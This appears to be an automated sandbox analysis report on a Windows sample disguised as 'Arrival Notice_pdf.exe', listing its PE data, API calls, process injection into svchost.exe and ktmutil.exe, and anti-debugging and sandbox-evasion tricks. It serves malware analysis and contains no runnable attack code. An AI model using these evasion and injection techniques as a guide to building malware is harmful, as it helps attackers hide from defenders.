Source: Arrival Notice_pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Arrival Notice_pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Arrival Notice_pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Arrival Notice_pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Arrival Notice_pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Arrival Notice_pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Arrival Notice_pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FMQUqumqqHn.exe, 00000005.00000002.3006363312.00000000004FE000.00000002.00000001.01000000.00000005.sdmp, FMQUqumqqHn.exe, 00000008.00000000.2191029645.00000000004FE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: Arrival Notice_pdf.exe, 00000000.00000003.1784335929.0000000003520000.00000004.00001000.00020000.00000000.sdmp, Arrival Notice_pdf.exe, 00000000.00000003.1784514568.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2008747039.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2109463258.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2109463258.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2012567334.0000000003900000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000002.3008423846.0000000003D1E000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000002.3008423846.0000000003B80000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000003.2123552604.00000000039D1000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000003.2121605069.000000000382E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Arrival Notice_pdf.exe, 00000000.00000003.1784335929.0000000003520000.00000004.00001000.00020000.00000000.sdmp, Arrival Notice_pdf.exe, 00000000.00000003.1784514568.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.2008747039.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2109463258.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2109463258.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2012567334.0000000003900000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 00000007.00000002.3008423846.0000000003D1E000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000002.3008423846.0000000003B80000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000003.2123552604.00000000039D1000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000003.2121605069.000000000382E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ktmutil.pdbGCTL source: svchost.exe, 00000001.00000002.2109318956.0000000003412000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2109304919.0000000003400000.00000004.00000020.00020000.00000000.sdmp, FMQUqumqqHn.exe, 00000005.00000002.3007133802.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ktmutil.pdb source: svchost.exe, 00000001.00000002.2109318956.0000000003412000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2109304919.0000000003400000.00000004.00000020.00020000.00000000.sdmp, FMQUqumqqHn.exe, 00000005.00000002.3007133802.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: ktmutil.exe, 00000007.00000002.3006642463.0000000003543000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000002.3009265180.00000000041AC000.00000004.10000000.00040000.00000000.sdmp, FMQUqumqqHn.exe, 00000008.00000000.2192129753.0000000002ADC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2439887561.000000003850C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: ktmutil.exe, 00000007.00000002.3006642463.0000000003543000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000002.3009265180.00000000041AC000.00000004.10000000.00040000.00000000.sdmp, FMQUqumqqHn.exe, 00000008.00000000.2192129753.0000000002ADC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2439887561.000000003850C000.00000004.80000000.00040000.00000000.sdmp

Source: Arrival Notice_pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Arrival Notice_pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Arrival Notice_pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Arrival Notice_pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Arrival Notice_pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_0025E01E LoadLibraryA,GetProcAddress,

0_2_0025E01E

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0026C09E push esi; ret	0_2_0026C0A0
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0026C187 push edi; ret	0_2_0026C189
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_002AC8BC push esi; ret	0_2_002AC8BE
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_00266B05 push ecx; ret	0_2_00266B18
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0028B2B1 push FFFFFF8Bh; iretd	0_2_0028B2B3
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0026BDAA push edi; ret	0_2_0026BDAC
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0026BEC3 push esi; ret	0_2_0026BEC5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416096 push eax; ret	1_2_004160E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004168B9 push 49A0F8CEh; ret	1_2_00416912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004160BB push eax; ret	1_2_004160E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416970 push 49A0F8CEh; ret	1_2_00416912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041692F push 49A0F8CEh; ret	1_2_00416912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004191FC push es; ret	1_2_00419202
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004049B6 push cs; iretd	1_2_004049BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004032E0 push eax; ret	1_2_004032E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00415A90 push ds; retf	1_2_00415A93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00411BB6 push ecx; retf	1_2_00411BB8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004065E5 push cs; ret	1_2_004065F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00404E33 push ds; iretd	1_2_00404E63
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040D6C1 push ebp; retf	1_2_0040D6CA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00404E91 push ds; iretd	1_2_00404E63
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B0225F pushad ; ret	1_2_03B027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B027FA pushad ; ret	1_2_03B027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B309AD push ecx; mov dword ptr [esp], ecx	1_2_03B309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B0283D push eax; iretd	1_2_03B02858
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03B8225F pushad ; ret	7_2_03B827F9
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03B827FA pushad ; ret	7_2_03B827F9
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03BB09AD push ecx; mov dword ptr [esp], ecx	7_2_03BB09B6
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03B8283D push eax; iretd	7_2_03B82858
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_03B81368 push eax; iretd	7_2_03B81369
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_032B60A8 push ecx; retf	7_2_032B6109

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_002A8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_002A8111
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0025EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0025EB42

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_0026123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0026123A

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	API/Special instruction interceptor: Address: D092B4
Source: C:\Windows\SysWOW64\ktmutil.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\ktmutil.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\ktmutil.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\ktmutil.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\ktmutil.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\ktmutil.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\ktmutil.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\ktmutil.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_03B7096E rdtsc

1_2_03B7096E

Source: C:\Windows\SysWOW64\ktmutil.exe

Window / User API: threadDelayed 9781

Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Evaded block: after key decision

graph_0-93322

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-94104

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	API coverage: 4.6 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\ktmutil.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\ktmutil.exe TID: 7936	Thread sleep count: 190 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe TID: 7936	Thread sleep time: -380000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe TID: 7936	Thread sleep count: 9781 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe TID: 7936	Thread sleep time: -19562000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe TID: 7956	Thread sleep time: -35000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\ktmutil.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\ktmutil.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_00286CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00286CA9
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_002860DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_002860DD
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_002863F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_002863F9
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0028EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0028EB60
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0028F56F FindFirstFileW,FindClose,	0_2_0028F56F
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0028F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0028F5FA
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_00291B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00291B2F
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_00291C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00291C8A
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_00291F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00291F94
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_032BC810 FindFirstFileW,FindNextFileW,FindClose,	7_2_032BC810

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_0025DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0025DDC0

Source: ktmutil.exe, 00000007.00000002.3006642463.0000000003543000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
Source: FMQUqumqqHn.exe, 00000008.00000002.3007516587.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
Source: firefox.exe, 00000009.00000002.2441564019.0000022AF850C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	API call chain: ExitProcess graph end node			graph_0-92522
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	API call chain: ExitProcess graph end node			graph_0-93430

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_03B7096E rdtsc

1_2_03B7096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00417A83 LdrLoadDll,

1_2_00417A83

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_00296AAF BlockInput,

0_2_00296AAF

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_00243D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00243D19

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_00273920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

0_2_00273920

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_0025E01E LoadLibraryA,GetProcAddress,

0_2_0025E01E

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_00D09580 mov eax, dword ptr fs:[00000030h]	0_2_00D09580
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_00D09520 mov eax, dword ptr fs:[00000030h]	0_2_00D09520
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_00D07F00 mov eax, dword ptr fs:[00000030h]	0_2_00D07F00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h]	1_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h]	1_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h]	1_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h]	1_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h]	1_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h]	1_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5438F mov eax, dword ptr fs:[00000030h]	1_2_03B5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5438F mov eax, dword ptr fs:[00000030h]	1_2_03B5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]	1_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]	1_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]	1_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B663FF mov eax, dword ptr fs:[00000030h]	1_2_03B663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]	1_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]	1_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]	1_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]	1_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]	1_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]	1_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]	1_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]	1_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE3DB mov eax, dword ptr fs:[00000030h]	1_2_03BDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE3DB mov eax, dword ptr fs:[00000030h]	1_2_03BDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE3DB mov ecx, dword ptr fs:[00000030h]	1_2_03BDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE3DB mov eax, dword ptr fs:[00000030h]	1_2_03BDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD43D4 mov eax, dword ptr fs:[00000030h]	1_2_03BD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD43D4 mov eax, dword ptr fs:[00000030h]	1_2_03BD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEC3CD mov eax, dword ptr fs:[00000030h]	1_2_03BEC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]	1_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]	1_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]	1_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]	1_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB63C0 mov eax, dword ptr fs:[00000030h]	1_2_03BB63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C0634F mov eax, dword ptr fs:[00000030h]	1_2_03C0634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2C310 mov ecx, dword ptr fs:[00000030h]	1_2_03B2C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B50310 mov ecx, dword ptr fs:[00000030h]	1_2_03B50310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h]	1_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h]	1_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h]	1_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD437C mov eax, dword ptr fs:[00000030h]	1_2_03BD437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C08324 mov eax, dword ptr fs:[00000030h]	1_2_03C08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C08324 mov ecx, dword ptr fs:[00000030h]	1_2_03C08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C08324 mov eax, dword ptr fs:[00000030h]	1_2_03C08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C08324 mov eax, dword ptr fs:[00000030h]	1_2_03C08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]	1_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]	1_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]	1_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB035C mov ecx, dword ptr fs:[00000030h]	1_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]	1_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]	1_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFA352 mov eax, dword ptr fs:[00000030h]	1_2_03BFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD8350 mov ecx, dword ptr fs:[00000030h]	1_2_03BD8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B402A0 mov eax, dword ptr fs:[00000030h]	1_2_03B402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B402A0 mov eax, dword ptr fs:[00000030h]	1_2_03B402A0
